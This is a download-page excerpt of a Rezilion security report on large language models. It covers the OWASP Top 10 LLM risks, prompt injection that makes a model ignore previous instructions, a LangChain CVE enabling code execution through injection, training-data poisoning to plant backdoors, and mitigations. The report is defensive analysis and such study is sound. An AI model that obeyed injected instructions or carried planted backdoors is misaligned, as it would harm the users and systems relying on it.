没有合适的资源?快使用搜索试试~ 我知道了~
大语言模型开源安全环境报告.pdf
需积分: 5 2 下载量 32 浏览量
2023-07-02
11:48:30
上传
评论
收藏 3.15MB PDF 举报
温馨提示
试读
29页
大语言模型开源安全环境报告.pdf
资源推荐
资源详情
资源评论
Rezilion
Research
BY YOTAM PERKAL AND KATYA DONCHENKO
Introduction
GENERATIVE ARTIFICIAL INTELLIGENCE (AI) HAS EXPERIENCED A REMARKABLE RISE IN RECENT YEARS,
revolutionizing how we create, interact with, and consume digital content. With the advent of Large
Language Models (LLMs) like GPT (Generative Pre-Trained Transformer), the capabilities of Generative AI
have reached unprecedented levels, enabling machines to generate human-like text, images, and even
code. However, as with any transformative technology, the adoption of Generative AI also brings forth a
set of challenges, particularly in the realm of security. In this research, we will delve into the emergence of
Generative AI, addressing not only the security concerns related to Large Language Models (LLMs) but also
the broader security considerations accompanying the adoption of any new technology.
Generative AI models are making their way to more and more industries, including healthcare, nance,
transportation, entertainment, real estate, education, and even cybersecurity. They are becoming
integral to search engines, voice assistants, social networks, and more. It seems that every day a different
company announces a new Generative AI-based capability.
In the rush to quickly go to market, is enough focus being put on the security aspects of this new
technology? Are proper risk assessments being conducted? Are the inherent shortcomings of these
models taken into account? Are proper security controls put in place to prevent their abuse? We will show
through our research on this topic, the unfortunate answer to these questions is that not enough is being
done to address the security risks inherent to these technologies.
Attackers are already starting to take notice and exploit the surging popularity of these Generative
AI-based models to their advantage. In a recent example, a fake GPT project recently revealed by the
Sonicwall Capture Labs research team claimed to provide a better AI tool than ChatGPT. Upon installation,
the project opens the Chrome browser with the real OpenAI website leading the victim to believe that
the real ChatGPT was installed. Yet silently, it executes a batch le named g pt 4.b at which in turn loads a
malicious browser extension named “dmkamcknogkgcdfhhbddcghachkejeapgpt4” containing obfuscated
javascript code whose primary function is to steal Facebook cookies.
www.rezilion.com
ExplAIning the Risk: Exploring the Large Language Models Open-Source Security Landscape
|
1
EXPL NING THE RISK:
Exploring the Large
Language Models Open-Source
Security Landscape
www.rezilion.com
ExplAIning the Risk: Exploring the Large Language Models Open-Source Security Landscape
|
2
Rezilion
Research
On one hand, AI Introduces new threat vectors that did not exist before, which now require attention and
awareness. On the other hand, some of the risks stemming from using these AI systems are not new, they
are the same security risks that we already know, yet often do not give enough attention to when it comes
to using AI systems. More on that below.
Security risks in Machine Learning/AI systems can affect all aspects of the CIA triad. For example:
Condentiality — Leakage of secrets, private training data, and more
Integrity — Adversarial attacks could be used to evade detection or manipulate the
model output
Availability — adversaries could craft specic input designed to exhaust or maximize
compute or inference cost
This research focuses on the risk relating to Large Language Models in particular as well as their broader
open-source ecosystem.
Generative AI is surging in popularity — and making headlines in recent months.
www.rezilion.com
ExplAIning the Risk: Exploring the Large Language Models Open-Source Security Landscape
|
3
Rezilion
Research
Risk CategoryCategory
LLM01:2023 —
Prompt Injections
LLM02:2023 —
Data Leakage
LLM03:2023 —
Inadequate Sandboxing
LLM04:2023 —
Unauthorized
Code Execution
LLM05:2023 —
SSRF Vulnerabilities
LLM06:2023 —
Overreliance on LLM-
generated Content
LLM07:2023 —
Inadequate AI Alignment
LLM08:2023 —
Insufcient Access
Controls
LLM09:2023 —
Improper Error Handling
LLM10:2023 —
Training Data Poisoning
Trust Boundary Risk/
Inherent Model Risk
Data Management Risk
Trust Boundary Risk
Trust Boundary Risk
Trust Boundary Risk
Inherent Model Risk
Inherent Model Risk
Trust Boundary Risk/
Basic Security
Best Practice
Basic Security
Best Practice
Data Management Risk
Bypassing lters or manipulating the LLM
using carefully crafted prompts that make the
model ignore previous instructions or perform
unintended actions.
Accidentally revealing sensitive information,
proprietary algorithms, or other condential
details through the LLM’s responses.
Failing to properly isolate LLMs when they
have access to external resources or sensitive
systems, allowing for potential exploitation
and unauthorized access.
Exploiting LLMs to execute malicious code,
commands, or actions on the underlying
system through natural language prompts.
Exploiting LLMs to perform unintended
requests or access restricted resources, such
as internal services, APIs, or data stores.
Excessive dependence on LLM-generated
content without human oversight can result
in harmful consequences.
Failing to ensure that the LLM’s objectives
and behavior align with the intended use
case, leading to undesired consequences
or vulnerabilities.
Not properly implementing access controls
or authentication, allowing unauthorized
users to interact with the LLM and potentially
exploit vulnerabilities.
Exposing error messages or debugging
information that could reveal sensitive
information, system details, or potential
attack vectors.
Maliciously manipulating training data or
ne-tuning procedures to introduce
vulnerabilities or backdoors into the LLM.
Security Risks in LLM Projects
OWASP RECENTLY RELEASED A DRAFT OF THE OWASP TOP 10 SECURITY RISKS LIST for Large Language Model
Applications. With this resource, we can better understand the important vulnerability types for Articial
Intelligence (AI) applications built on Large Language Models (LLMs).
www.rezilion.com
ExplAIning the Risk: Exploring the Large Language Models Open-Source Security Landscape
|
4
Rezilion
Research
Generally speaking, while there is some overlap, we can divide the risks into several groups:
Trust Boundary Risk
Data Management Risk
Inherent Model Risk
Basic Security Best Practice
Let’s explore each group of risks:
Trust Boundary Risk
Risks such as inadequate sandboxing, unauthorized code execution, SSRF vulnerabilities, insufcient access
controls, and even prompt injections in a sense, all fall under the general concept of trust boundaries.
Trust boundaries help us establish zones of trust where we have condence in the security and reliability
of the components and data within them. Beyond these boundaries, there is a level of uncertainty and
potential risk. By dening trust boundaries, we can implement appropriate security measures and controls
to protect our sensitive information and ensure that only authorized access and interactions occur within
trusted areas. Trust boundaries are virtual fences that help us maintain a secure environment and protect
our digital assets from potential threats.
HOW DOES IT MANIFEST?
In the context of LLMs, trust boundary risks are specically signicant as users enable LLMs to utilize external
resources such as databases, search interfaces, or external computing tools, which can greatly enhance
their functionalities. Nonetheless, the inherent unpredictability of LLM completion outputs necessitates
cautious integration to prevent potential manipulation by malicious actors. Failure to address this concern
adequately can signicantly elevate the risks associated with these models.
For the purposes of this analysis, we have included prompt injection under the trust boundary risks category
because once plugins are being used (meaning the Large Language Model now has the ability to call one
or more different APIs), prompt injections can be used to cross trust boundaries.
Recognizing that attackers can extract or manipulate any information provided in the prompt is crucial.
Merely protecting LLM models at the prompt level is inadequate, as the root issue lies in the incorrect
establishment of trust boundaries. It’s important to understand that anyone who can input text into the LLM,
including users, accessed websites, and LLM plugins, can inuence its output.
This emphasizes the necessity of addressing trust boundaries, threat models, and authorization concerns
instead of treating them as complex AI problems. By acknowledging the potential manipulation of LLMs and
applying appropriate trust to their output, we can approach their integration more effectively and mitigate
potential risks.
There have already been examples of such issues in the wild. For example, CVE-2023-29374, a vulnerability
in LangChain (the third most-popular open-source GPT-based project at this time), made it susceptible to
prompt injection attacks that can execute arbitrary code via the Python exec method.
www.rezilion.com
ExplAIning the Risk: Exploring the Large Language Models Open-Source Security Landscape
|
5
Rezilion
Research
HOW CAN THE RISK BE MITIGATED?
In the same way, security guardrails have been developed around common risks in the software
development domain, AI models and their encompassing ecosystem must develop the same
compensating controls and best practices.
For example, to prevent SQL injections, we have learned as an industry to apply strategies such as input
validation and sanitization; the same techniques must be adapted to address prompt injection risk.
For example, if possible, refrain from allowing free-form text input from being fed directly to the LLM, instead,
opt for having a standard set of options (a dropdown list, for example) from which the user can choose how
to interact with the model.
If freeform input is required, implement strict input validation and sanitization of user-provided prompts. Be
sure to constantly update and ne-tune the LLM to improve its understanding of malicious inputs and edge
cases, and monitor and log all LLM interactions to detect and analyze potential prompt injection attempts.
Additionally, it is imperative to enforce proper sandboxing and segregation by restricting the LLM’s access to
network resources, internal services, and APIs.
Data Management Risk
Risks such as data leakage and training data poisoning fall under the data management risks category.
These risks are relevant to any machine learning system and are not unique to Large Language Models, yet
they should be addressed nonetheless.
HOW DOES IT MANIFEST?
Training data poisoning refers to the deliberate manipulation of an LLM’s training data or ne-tuning
procedures by an attacker to introduce vulnerabilities, backdoors, or biases that can undermine the
security, effectiveness, or ethical behavior of the model. This malicious act aims to compromise the integrity
and reliability of the LLM by injecting misleading or harmful information during the training process.
Data leakage refers to an LLM’s unintentional disclosure of sensitive information, proprietary algorithms, or
other condential details in its responses. This inadvertent disclosure can lead to unauthorized access to
valuable data or intellectual property, compromising privacy and giving rise to various security breaches.
An additional concern related to the disclosure of private data is the potential for ChatGPT to reveal
personal information, leading to the dissemination of speculative or harmful content.
HOW CAN THE RISK BE MITIGATED?
Training data must be sourced from reliable and veried sources. Its integrity should also be veried by
conducting thorough quality validation as well as employing robust data sanitization and preprocessing
techniques to eliminate vulnerabilities and biases and ensure its reliability and fairness.
Strict output ltering and context-aware mechanisms to safeguard against the inadvertent disclosure of
sensitive information by the LLM should be employed to address data leakage risks.
Differential privacy techniques or other data anonymization methods could also be applied during the LLM’s
training to mitigate the risks of overtting and memorization. It is advised to conduct regular audits and
reviews of the LLM’s responses to identify and proactively prevent any unintended disclosure of sensitive
information. Additionally, comprehensive monitoring and logging practices should be used to detect and
analyze potential data leakage incidents arising from LLM interactions.
剩余28页未读,继续阅读
资源评论
zhao-lucy
- 粉丝: 19
- 资源: 446
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功